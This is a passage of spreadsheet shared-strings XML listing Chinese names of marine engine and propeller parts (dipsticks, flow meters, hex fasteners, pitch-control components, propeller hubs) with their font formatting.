    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">WAY VALVE    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）？</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量油尺管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量油尺模塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量油尺手柄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量油尺头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量油尺支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量油尺总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磷化处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>零部件名牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>零部件清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>零螺距装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>零螺距装置的尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>领料清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>领料清单，备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>领料说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量阀装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量分支开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量观察窗</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量和液位传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量计，电子式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量开关安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量控制杯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量控制分离器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六方连接螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角凹头插销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角凹头键</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角扳手部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角垫圈面螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角盖螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角固定螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角键槽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角紧配螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺母</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺母接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺栓</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺柱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头螺栓</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角自锁式螺帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>楼梯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>楼梯支撑板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏斗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏斗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏油排放</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>炉顶钢圈盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>露点柜警报</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮毂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮支座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>罗茨鼓风机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双叶转子鼓风机总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>罗茨鼓风机的转子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺钉</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺钉和螺母固定</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺钉和螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距传感器调整和测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距控制杆用盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距调节</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距调节杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距调节检验单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距调节头导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距调节头导套，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距调节头右侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距调节头左侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距调节总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距指示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母，圆形，勾形扳手用</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母，圆形特制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母叉板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母护圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母座研磨环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨损传感器）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺丝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺丝，十字型凹槽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺丝，凸圆头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺丝刀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺丝</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺丝</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸圆头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹焊接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹接头</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹密封胶</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹嵌套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹十字梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨布局数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨冲洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨毂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨毂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
